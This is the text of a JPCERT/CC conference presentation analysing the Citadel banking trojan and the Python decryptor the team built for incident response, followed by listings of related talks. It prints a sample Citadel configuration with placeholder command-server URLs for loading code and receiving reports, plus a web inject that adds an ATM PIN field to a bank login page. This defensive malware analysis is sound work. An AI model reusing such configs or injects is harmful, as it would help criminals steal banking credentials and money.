Fight Against Citadel in Japan  by You Nakatsuru

CODE BLUE
CODE BLUECODE BLUE
Fight Against
Citadel in Japan
2014/02/18
JPCERT/CC Analysis Center
NAKATSURU You
Copyright©2014 JPCERT/CC All rights reserved.1
Agenda
Background
—Unauthorized Remittance in Japan
Analyzing Citadel
—Overview
—Encryption
Making of Citadel Decryptor
Citadel Decryptor
—Usage
—Demo
Copyright©2014 JPCERT/CC All rights reserved.2
BACKGROUND
Copyright©2014 JPCERT/CC All rights reserved.3
Illegal Transfer in Japan
$14million
$500k
$3million
2011 2012 2013
http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
Targeting 32 Banks
Copyright©2014 JPCERT/CC All rights reserved.4
Related with Malware
http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
In most cases, passwords are retrieved
and abused through defaced web pages
where malware request users to
authenticate
Copyright©2014 JPCERT/CC All rights reserved.5
Banking Trojan
ZeuS
Ice IX
Citadel
GameOver
SpyEye Carberp etc.
Copyright©2014 JPCERT/CC All rights reserved.6
Why Citadel?
http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
Copyright©2014 JPCERT/CC All rights reserved.7
Banking Trojan Incident
Back Connect
Server
Web
Panel
Attacker
User
Internet
Banking
Copyright©2014 JPCERT/CC All rights reserved.8
Web Injects
User
Internet
Banking
Copyright©2014 JPCERT/CC All rights reserved.9
Web Injects Demo
Copyright©2014 JPCERT/CC All rights reserved.10
Builder & Web Panel
Copyright©2014 JPCERT/CC All rights reserved.11
Underground Market
Copyright©2014 JPCERT/CC All rights reserved.12
Our Incident Response
Back Connect
Server
Web
Panel
Attacker
User
Internet
Banking
Information
Sharing
Copyright©2014 JPCERT/CC All rights reserved.13
Information We Need
Back Connect
Server
Web
Panel
Attacker
User
Internet
Banking
Which site
is targeted
Where
Where
How
Where
Copyright©2014 JPCERT/CC All rights reserved.14
ANALYZING CITADEL
Copyright©2014 JPCERT/CC All rights reserved.15
External Information
Leaked
Citadel
Web panel
Builder
Leaked
ZeuS
Web panel
Builder
ZeuS
source
Web panel
source
Builder
source
Binary
Debug
info
Blogs
Sophos
LEXSI
Copyright©2014 JPCERT/CC All rights reserved.16
Analysis Method
•Retrieving information
Surface Analysis
•Monitoring tools, Sandbox and
debugging
Runtime Analysis
•Reading source code, assembly code
Static Analysis
Copyright©2014 JPCERT/CC All rights reserved.17
Static Analysis
Diffing with ZeuS
Copyright©2014 JPCERT/CC All rights reserved.18
Citadel Overview
Sending report
Current settings,
etc.
Web
Injects
Copyright©2014 JPCERT/CC All rights reserved.19
Configuration Files
•Default settings
•Encryption key, URL of Dynamic
Config
•Encoded and hardcoded
Base Config
•Additional settings
•HTTP Injection, etc…
•Downloaded from servers
Dynamic Config
Copyright©2014 JPCERT/CC All rights reserved.20
botnet "CIT"
timer_config 4 9
timer_logs 3 6
timer_stats 4 8
timer_modules 1 4
timer_autoupdate 8
url_config1 "http://citadelhost/folder/file.php|file=config.dll"
url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll"
remove_certs 1
disable_cookies 0
encryption_key "key123"
report_software 1
enable_luhn10_get 0
enable_luhn10_post 1
disable_antivirus 0
use_module_video 1
antiemulation_enable 0
disable_httpgrabber 0
use_module_ffcookie 1
Base Config
Dynamic Config URL
Password to generate
RC4 key
Copyright©2014 JPCERT/CC All rights reserved.21
Dynamic Config
url_loader "http://citadelhost/folder/file.php|file=soft.exe"
url_server "http://citadelhost/folder/gate.php"
file_webinjects "injects.txt"
url_webinjects "http://citadelhost/folder/file.php"
entry "AdvancedConfigs"
"http://reserve-host1/folder/file.php|file=config.bin"
"http://reserve-host2/folder/file.php|file=config.bin"
end
entry "WebFilters"
"#*wellsfargo.com/*"
"@*payment.com/*"
"!http://*.com/*.jpg"
end
(snip)
set_url https://www.wellsfargo.com/ GP
data_before
<div><strong><label for="userid">Username</la
data_end
data_inject
<input type="text" accesskey="U" id="userid" na
<DIV><STRONG><LABEL for=userid>ATM Pin</L
style="WIDTH: 147px" tabIndex="2" maxLength=
<DIV><STRONG><label for="password">Passwo
<input type="password" accesskey="P" id="pass
<input type="hidden" name="screenid" value="SI
<input type="submit" value="Go" name="btnSign
<input type="hidden" id="u_p" name="u_p" value
</form>
data_end
Copyright©2014 JPCERT/CC All rights reserved.22
Encryption
Copyright©2014 JPCERT/CC All rights reserved.23
Encrypted Data
Copyright©2014 JPCERT/CC All rights reserved.24
Encrypted Data
Packet
POST data
(report file)
Dynamic
Config
Additional
modules
File
Report
Backup of
additional
modules
Registry
Current
settings
Backup of
Dynamic
Config
Copyright©2014 JPCERT/CC All rights reserved.25
Encryption Method
• AES encryption and XOR encoding
AES+
• RC4 encryption and XOR encoding
RC4+
• Encryption of RC4+ twice
RC4+ * 2
• AES+ encryption using random generated key when
installd
Installed Data
Copyright©2014 JPCERT/CC All rights reserved.26
In Case of Dynamic Config
Base
Config
Dynamic
Config
XOR
AES+
UCL
Copyright©2014 JPCERT/CC All rights reserved.27
0x400 Bytes Overlay
PE file PE file
Install setting
Installed data
Before install After install
XOR key
ID, Install paths,
AES key,
StrageArray key, etc.
Padding
Padding
Copyright©2014 JPCERT/CC All rights reserved.28
Encryption Summary
Category Data Format Encryption
Packet
Report
Encrypted
BinStrage
RC4+
Dynamic Config
Encrypted
BinStrage
AES+
Additional modules Executable RC4+ * 2
File
Report file StrageArray Installed Data
Backup of modules StrageArray Installed Data
Registry
Backup of Dynamic
Config
Encrypted
BinStrage
Installed Data
Copyright©2014 JPCERT/CC All rights reserved.29
MAKING OF
CITADEL DECRYPTOR
Copyright©2014 JPCERT/CC All rights reserved.30
Our Goal
Decrypt data & retrieve information for incident
response
Copyright©2014 JPCERT/CC All rights reserved.31
Implementation
Python PyCrypto
pefile UCL
Copyright©2014 JPCERT/CC All rights reserved.32
RC4+ Decryption
Get RC4
keystream
RC4
Visual
Decrypt
Copyright©2014 JPCERT/CC All rights reserved.33
RC4+ Implementation
def rc4_plus_decrypt(login_key, base_key, buf):
S1 = base_key['state']
S2 = map(ord, login_key)
out = ""
i = j = k = 0
for c in buf:
i = (i + 1) & 0xFF
j = (j + S1[i]) & 0xFF
S1[i], S1[j] = S1[j], S1[i]
out += chr((ord(c) ^ S1[(S1[i]+S1[j])&0xFF])
^ S2[k%len(S2)])
k += 1
return out
Copyright©2014 JPCERT/CC All rights reserved.34
Get AES
key
AES
Decrypt
Visual
Decrypt
AES+ Decryption
Copyright©2014 JPCERT/CC All rights reserved.35
AES+ Implementation
def unpack_aes_plus(login_key, base_key, xor_key,
aes_key, data):
aes = AES.new(aes_key)
tmp = aes.decrypt(data)
out = ""
for i in range(len(tmp)):
out += chr(ord(tmp[i]) ^
ord(xor_key[i%len(xor_key)]))
return out
Copyright©2014 JPCERT/CC All rights reserved.36
Decryption Parameter
Base
Config
RC4 key
Installed
Data
StrageArray
key
Random
AES key
Others
Salt
LoginKey
RC4 XOR
key
Copyright©2014 JPCERT/CC All rights reserved.37
Obtaining Parameter
re.compile(".*¥x56¥xBA(..)¥x00¥x00¥x52¥x68(....)
¥x50¥xE8....¥x8B¥x0D.*", re.DOTALL)
Copyright©2014 JPCERT/CC All rights reserved.38
UCL Decompress
http://www.oberhumer.com/opensource/ucl/
Copyright©2014 JPCERT/CC All rights reserved.39
UCL Decompress using ctypes
def _ucl_decompress(self, data):
ucl = cdll.LoadLibrary(UCL)
compressed = c_buffer(data)
decompressed = c_buffer(DECOMPRESS_MAX_SIZE)
decompressed_size = c_int()
result = ucl.ucl_nrv2b_decompress_le32(
pointer(compressed),
c_int(len(compressed.raw)),
pointer(decompressed),
pointer(decompressed_size))
return decompressed.raw[:decompressed_size.value]
Copyright©2014 JPCERT/CC All rights reserved.40
CITADEL DECRYPTOR
Copyright©2014 JPCERT/CC All rights reserved.41
Environment
• Citadel Decryptor is only available for 32bit environment
Windows + 32bit Python
• For AES decryption
• Windows binary
• http://www.voidspace.org.uk/python/modules.shtml#pycrypto
PyCrypto
• A Python module for parsing PE file format (Windows executable)
• For parsing PE sections to get decryption params
pefile
Copyright©2014 JPCERT/CC All rights reserved.42
Data Requirement
Encrypted data
Unpacked Citadel
• RC4 key
• XOR key for AES+
• XOR key for RC4+ (LOGINKEY)
• Salt for RC4+
Installed Citadel
• Installed Data
• Random generated AES key
• Random generated StrageArray key
Copyright©2014 JPCERT/CC All rights reserved.43
citadel_decryptor.py
Encrypted data & unpacked module are always
required
>citadel_decryptor.py
usage: citadel_decryptor.py [-h] [-n] [-a] [-d]
[-o OUT] [-D] [-l LOGIN]
[-k KEY] [-x XOR] [-s SALT]
[-i INSTALLED]
[-m MODE] [-v]
DAT EXE
citadel_decryptor.py: error: too few arguments
>
Copyright©2014 JPCERT/CC All rights reserved.44
Cheat Sheet
The following options have to be specified as well
as encrypted data and unpacked Citadel
Category Data Option
Packet
Report -m2
Dynamic Config -d
Additional modules -m3 -n
File
Report files -a -i [Installed Citadel]
Backup of modules -a -i [Installed Citadel]
Registry Backup of Dynamic Config -d -i [Installed Citadel]
Copyright©2014 JPCERT/CC All rights reserved.45
Demo
Copyright©2014 JPCERT/CC All rights reserved.46
Tips
Convert registry data to binary
• Export data using regedit & convert them to binary
using the following FileInsight plugin
• https://github.com/nmantani/FileInsight-plugins
Unpacking
• It is easy to break on APIs
• WriteProcessMemory
• CreateProcessW
• VirtualFree / VirtualFreeEx / RtlFreeHeap
• Dump executable (not after allocated) from virtual
memory
• including 0x400 bytes overlay
Copyright©2014 JPCERT/CC All rights reserved.47
Future Tasks
We already have
• ZeuS Decryptor
• Ver 2.0.8.9
• Ver 2.9.6.1
• Ice IX Decryptor
• etc.
We want
• Gameover (P2P ZeuS) Decryptor
Thank You!
Contact
aa-info@jpcert.or.jp
https://www.jpcert.or.jp
Incident report
info@jpcert.or.jp
https://www.jpcert.or.jp/form/
1 of 49

Recommended

CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev) by
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)PROIDEA
142 views28 slides
Linux resource limits by
Linux resource limitsLinux resource limits
Linux resource limitsMarian Marinov
178 views31 slides
Linux Resource Management - Мариян Маринов (Siteground) by
Linux Resource Management - Мариян Маринов (Siteground)Linux Resource Management - Мариян Маринов (Siteground)
Linux Resource Management - Мариян Маринов (Siteground)PlovDev Conference
119 views31 slides
Introduction to CUDA C: NVIDIA : Notes by
Introduction to CUDA C: NVIDIA : NotesIntroduction to CUDA C: NVIDIA : Notes
Introduction to CUDA C: NVIDIA : NotesSubhajit Sahu
63 views62 slides
Accelerating HPC Applications on NVIDIA GPUs with OpenACC by
Accelerating HPC Applications on NVIDIA GPUs with OpenACCAccelerating HPC Applications on NVIDIA GPUs with OpenACC
Accelerating HPC Applications on NVIDIA GPUs with OpenACCinside-BigData.com
2.1K views39 slides
Introduction to CUDA by
Introduction to CUDAIntroduction to CUDA
Introduction to CUDARaymond Tay
5.6K views31 slides

More Related Content

What's hot

Encryption Boot Camp at JavaZone 2010 by
Encryption Boot Camp at JavaZone 2010Encryption Boot Camp at JavaZone 2010
Encryption Boot Camp at JavaZone 2010Matthew McCullough
1.8K views98 slides
DPDK Summit 2015 - RIFT.io - Tim Mortsolf by
DPDK Summit 2015 - RIFT.io - Tim MortsolfDPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim MortsolfJim St. Leger
2.9K views13 slides
DPDK Summit 2015 - NTT - Yoshihiro Nakajima by
DPDK Summit 2015 - NTT - Yoshihiro NakajimaDPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaJim St. Leger
1.3K views33 slides
Advanced Encryption on the JVM v0.2.8 by
Advanced Encryption on the JVM v0.2.8Advanced Encryption on the JVM v0.2.8
Advanced Encryption on the JVM v0.2.8Matthew McCullough
2.2K views151 slides
Introduction to parallel computing using CUDA by
Introduction to parallel computing using CUDAIntroduction to parallel computing using CUDA
Introduction to parallel computing using CUDAMartin Peniak
4.8K views45 slides
Software Define your Current Storage with Opensource by
Software Define your Current Storage with OpensourceSoftware Define your Current Storage with Opensource
Software Define your Current Storage with OpensourceAntonio Romeo
429 views17 slides

What's hot(20)

DPDK Summit 2015 - RIFT.io - Tim Mortsolf by Jim St. Leger
DPDK Summit 2015 - RIFT.io - Tim MortsolfDPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim Mortsolf
Jim St. Leger2.9K views
DPDK Summit 2015 - NTT - Yoshihiro Nakajima by Jim St. Leger
DPDK Summit 2015 - NTT - Yoshihiro NakajimaDPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
Jim St. Leger1.3K views
Introduction to parallel computing using CUDA by Martin Peniak
Introduction to parallel computing using CUDAIntroduction to parallel computing using CUDA
Introduction to parallel computing using CUDA
Martin Peniak4.8K views
Software Define your Current Storage with Opensource by Antonio Romeo
Software Define your Current Storage with OpensourceSoftware Define your Current Storage with Opensource
Software Define your Current Storage with Opensource
Antonio Romeo429 views
Apache Commons ソースリーディングの会:Codec by moai kids
Apache Commons ソースリーディングの会:CodecApache Commons ソースリーディングの会:Codec
Apache Commons ソースリーディングの会:Codec
moai kids3.3K views
Cs423 raw sockets_bw by jktjpc
Cs423 raw sockets_bwCs423 raw sockets_bw
Cs423 raw sockets_bw
jktjpc122 views
Cryptography 101 for Java developers by Michel Schudel
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developers
Michel Schudel143 views
Dell Technologies Dell EMC Data Protection Solutions On One Single Page - POS... by Dell Technologies
Dell Technologies Dell EMC Data Protection Solutions On One Single Page - POS...Dell Technologies Dell EMC Data Protection Solutions On One Single Page - POS...
Dell Technologies Dell EMC Data Protection Solutions On One Single Page - POS...
Dell Technologies4.6K views
Dell Technologies Dell EMC ISILON Storage On One Single Page - POSTER - v1a S... by Dell Technologies
Dell Technologies Dell EMC ISILON Storage On One Single Page - POSTER - v1a S...Dell Technologies Dell EMC ISILON Storage On One Single Page - POSTER - v1a S...
Dell Technologies Dell EMC ISILON Storage On One Single Page - POSTER - v1a S...
Dell Technologies2.1K views
Dell Technologies Dell EMC POWERMAX Storage On One Single Page - POSTER - v1a... by Dell Technologies
Dell Technologies Dell EMC POWERMAX Storage On One Single Page - POSTER - v1a...Dell Technologies Dell EMC POWERMAX Storage On One Single Page - POSTER - v1a...
Dell Technologies Dell EMC POWERMAX Storage On One Single Page - POSTER - v1a...
Dell Technologies1.9K views
Kato Mivule: An Overview of CUDA for High Performance Computing by Kato Mivule
Kato Mivule: An Overview of CUDA for High Performance ComputingKato Mivule: An Overview of CUDA for High Performance Computing
Kato Mivule: An Overview of CUDA for High Performance Computing
Kato Mivule1K views
High Performance Networking Leveraging the DPDK and Growing Community by 6WIND
High Performance Networking Leveraging the DPDK and Growing CommunityHigh Performance Networking Leveraging the DPDK and Growing Community
High Performance Networking Leveraging the DPDK and Growing Community
6WIND12.6K views
Disruptive IP Networking with Intel DPDK on Linux by Naoto MATSUMOTO
Disruptive IP Networking with Intel DPDK on LinuxDisruptive IP Networking with Intel DPDK on Linux
Disruptive IP Networking with Intel DPDK on Linux
Naoto MATSUMOTO15.8K views
2014-4Q-OpenStack-Fall-presentation-public-20150310a by Ken Igarashi
2014-4Q-OpenStack-Fall-presentation-public-20150310a2014-4Q-OpenStack-Fall-presentation-public-20150310a
2014-4Q-OpenStack-Fall-presentation-public-20150310a
Ken Igarashi320 views
DPDK in Containers Hands-on Lab by Michelle Holley
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on Lab
Michelle Holley10.3K views

Viewers also liked

Networked Home Appliances and Vulnerabilities.  by Yukihisa Horibe by
Networked Home Appliances and Vulnerabilities.  by Yukihisa HoribeNetworked Home Appliances and Vulnerabilities.  by Yukihisa Horibe
Networked Home Appliances and Vulnerabilities.  by Yukihisa HoribeCODE BLUE
1.8K views41 slides
SCADA Software or Swiss Cheese Software?  by Celil UNUVER by
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERCODE BLUE
2.5K views52 slides
o-checker : Malicious document file detection tool - Malicious feature can be... by
o-checker : Malicious document file detection tool - Malicious feature can be...o-checker : Malicious document file detection tool - Malicious feature can be...
o-checker : Malicious document file detection tool - Malicious feature can be...CODE BLUE
3.6K views61 slides
libinjection: from SQLi to XSS  by Nick Galbreath by
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
6.8K views38 slides
Rehabilitation situation in vietnam by
Rehabilitation situation in vietnamRehabilitation situation in vietnam
Rehabilitation situation in vietnamCam Ba Thuc
1.7K views37 slides
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ... by
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...CODE BLUE
1.4K views35 slides

Viewers also liked(12)

Networked Home Appliances and Vulnerabilities.  by Yukihisa Horibe by CODE BLUE
Networked Home Appliances and Vulnerabilities.  by Yukihisa HoribeNetworked Home Appliances and Vulnerabilities.  by Yukihisa Horibe
Networked Home Appliances and Vulnerabilities.  by Yukihisa Horibe
CODE BLUE1.8K views
SCADA Software or Swiss Cheese Software?  by Celil UNUVER by CODE BLUE
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
CODE BLUE2.5K views
o-checker : Malicious document file detection tool - Malicious feature can be... by CODE BLUE
o-checker : Malicious document file detection tool - Malicious feature can be...o-checker : Malicious document file detection tool - Malicious feature can be...
o-checker : Malicious document file detection tool - Malicious feature can be...
CODE BLUE3.6K views
libinjection: from SQLi to XSS  by Nick Galbreath by CODE BLUE
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
CODE BLUE6.8K views
Rehabilitation situation in vietnam by Cam Ba Thuc
Rehabilitation situation in vietnamRehabilitation situation in vietnam
Rehabilitation situation in vietnam
Cam Ba Thuc1.7K views
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ... by CODE BLUE
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
CODE BLUE1.4K views
Amar jyoti school & rehabilitation center by Ashu Risky Rider
 Amar jyoti school & rehabilitation center Amar jyoti school & rehabilitation center
Amar jyoti school & rehabilitation center
Ashu Risky Rider1.3K views
Keynote : CODE BLUE in the ICU! by Jeff Moss by CODE BLUE
Keynote : CODE BLUE in the ICU! by Jeff MossKeynote : CODE BLUE in the ICU! by Jeff Moss
Keynote : CODE BLUE in the ICU! by Jeff Moss
CODE BLUE4.7K views
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida by CODE BLUE
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE4K views
Preventing hard disk firmware manipulation attack and disaster recovery by Da... by CODE BLUE
Preventing hard disk firmware manipulation attack and disaster recovery by Da...Preventing hard disk firmware manipulation attack and disaster recovery by Da...
Preventing hard disk firmware manipulation attack and disaster recovery by Da...
CODE BLUE3.7K views
The Current State of Automotive Security by Chris Valasek by CODE BLUE
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris Valasek
CODE BLUE31.5K views
Secret of Intel Management Engine by Igor Skochinsky by CODE BLUE
Secret of Intel Management Engine  by Igor SkochinskySecret of Intel Management Engine  by Igor Skochinsky
Secret of Intel Management Engine by Igor Skochinsky
CODE BLUE177.4K views

Similar to Fight Against Citadel in Japan  by You Nakatsuru

[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona... by
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...CODE BLUE
434 views92 slides
DPDK Summit 2015 - Intel - Keith Wiles by
DPDK Summit 2015 - Intel - Keith WilesDPDK Summit 2015 - Intel - Keith Wiles
DPDK Summit 2015 - Intel - Keith WilesJim St. Leger
4.6K views30 slides
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy... by
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...CODE BLUE
421 views46 slides
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c... by
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
147 views139 slides
A New Framework for Detection by
A New Framework for DetectionA New Framework for Detection
A New Framework for DetectionSourcefire VRT
520 views69 slides
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections by
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNoSuchCon
624 views41 slides

Similar to Fight Against Citadel in Japan  by You Nakatsuru(20)

[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona... by CODE BLUE
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
CODE BLUE434 views
DPDK Summit 2015 - Intel - Keith Wiles by Jim St. Leger
DPDK Summit 2015 - Intel - Keith WilesDPDK Summit 2015 - Intel - Keith Wiles
DPDK Summit 2015 - Intel - Keith Wiles
Jim St. Leger4.6K views
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy... by CODE BLUE
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...
[CB19] MalConfScan with Cuckoo: Automatic Malware Configuration Extraction Sy...
CODE BLUE421 views
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c... by Felipe Prado
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
Felipe Prado147 views
A New Framework for Detection by Sourcefire VRT
A New Framework for DetectionA New Framework for Detection
A New Framework for Detection
Sourcefire VRT520 views
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections by NoSuchCon
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NoSuchCon624 views
CCNA (R & S) Module 03 - Routing & Switching Essentials - Chapter 10 by Waqas Ahmed Nawaz
CCNA (R & S) Module 03 - Routing & Switching Essentials - Chapter 10CCNA (R & S) Module 03 - Routing & Switching Essentials - Chapter 10
CCNA (R & S) Module 03 - Routing & Switching Essentials - Chapter 10
Waqas Ahmed Nawaz166 views
Dpdk: rte_security: An update and introducing PDCP by Hemant Agrawal
Dpdk: rte_security: An update and introducing PDCPDpdk: rte_security: An update and introducing PDCP
Dpdk: rte_security: An update and introducing PDCP
Hemant Agrawal177 views
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE by Linaro
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
Linaro10.6K views
“Making Edge AI Inference Programming Easier and Flexible,” a Presentation fr... by Edge AI and Vision Alliance
“Making Edge AI Inference Programming Easier and Flexible,” a Presentation fr...“Making Edge AI Inference Programming Easier and Flexible,” a Presentation fr...
“Making Edge AI Inference Programming Easier and Flexible,” a Presentation fr...
Unmasking Careto through Memory Forensics (video in description) by Andrew Case
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
Andrew Case1.7K views
OpenNebulaConf 2019 - Crytek: A Video gaming Edge Implementation "on the shou... by Dmytro Korzhevin
OpenNebulaConf 2019 - Crytek: A Video gaming Edge Implementation "on the shou...OpenNebulaConf 2019 - Crytek: A Video gaming Edge Implementation "on the shou...
OpenNebulaConf 2019 - Crytek: A Video gaming Edge Implementation "on the shou...
Dmytro Korzhevin62 views
OpenNebulaConf2019 - Crytek: A Video gaming Edge Implementation "on the shoul... by OpenNebula Project
OpenNebulaConf2019 - Crytek: A Video gaming Edge Implementation "on the shoul...OpenNebulaConf2019 - Crytek: A Video gaming Edge Implementation "on the shoul...
OpenNebulaConf2019 - Crytek: A Video gaming Edge Implementation "on the shoul...
OpenNebula Project247 views
BKK16-103 OpenCSD - Open for Business! by Linaro
BKK16-103 OpenCSD - Open for Business!BKK16-103 OpenCSD - Open for Business!
BKK16-103 OpenCSD - Open for Business!
Linaro758 views
Blackhat USA 2016 - What's the DFIRence for ICS? by Chris Sistrunk
Blackhat USA 2016 - What's the DFIRence for ICS?Blackhat USA 2016 - What's the DFIRence for ICS?
Blackhat USA 2016 - What's the DFIRence for ICS?
Chris Sistrunk1.7K views
Securing your Cloud Environment v2 by ShapeBlue
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
ShapeBlue1.3K views
IMAGE CAPTURE, PROCESSING AND TRANSFER VIA ETHERNET UNDER CONTROL OF MATLAB G... by Christopher Diamantopoulos
IMAGE CAPTURE, PROCESSING AND TRANSFER VIA ETHERNET UNDER CONTROL OF MATLAB G...IMAGE CAPTURE, PROCESSING AND TRANSFER VIA ETHERNET UNDER CONTROL OF MATLAB G...
IMAGE CAPTURE, PROCESSING AND TRANSFER VIA ETHERNET UNDER CONTROL OF MATLAB G...
Using hypervisor and container technology to increase datacenter security pos... by Black Duck by Synopsys
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos... by Tim Mackey
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
Tim Mackey829 views
PA-3 Debugging Wireless with Wireshark Including Large Trace Files, AirPcap &... by Megumi Takeshita
PA-3 Debugging Wireless with Wireshark Including Large Trace Files, AirPcap &...PA-3 Debugging Wireless with Wireshark Including Large Trace Files, AirPcap &...
PA-3 Debugging Wireless with Wireshark Including Large Trace Files, AirPcap &...

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo... by
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
414 views72 slides
[cb22] Tales of 5G hacking by Karsten Nohl by
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
94 views34 slides
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A... by
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
112 views132 slides
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... by
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
14 views13 slides
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之 by
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
28 views13 slides
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... by
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
28 views21 slides

More from CODE BLUE(20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo... by CODE BLUE
